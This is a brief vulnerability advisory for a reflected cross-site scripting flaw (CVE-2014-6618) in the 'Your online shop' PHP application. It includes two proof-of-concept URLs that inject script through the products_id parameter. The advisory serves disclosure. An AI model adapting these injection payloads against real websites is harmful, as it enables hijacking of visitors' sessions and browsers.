Title: Your online shop GET Reflected XSS Severity: High CVE-ID: CVE-2014-6618 Release Date: 20 September 2014 Author: Kenneth F. Belva Websites: http://silverbackventuresllc.com http://xssWarrior.com http://securitymaverick.com Twitter: @infosecmaverick Contact: Please use website contact form. Mail: URL: http://sourceforge.net/projects/youronlineshop/ Vendor: Remote Exploit: Yes Discovered with: xssWarrior - http://xssWarrior.com Description: ============ XSS in both the script and HTML tags for the products_id field. Proof of Concept : ================== Script Tags http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22%29;+alert%2810%29;+// HTML Attribute http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22/%3E%3Cscript%3Ealert%2811%29%3C/script%3E%3C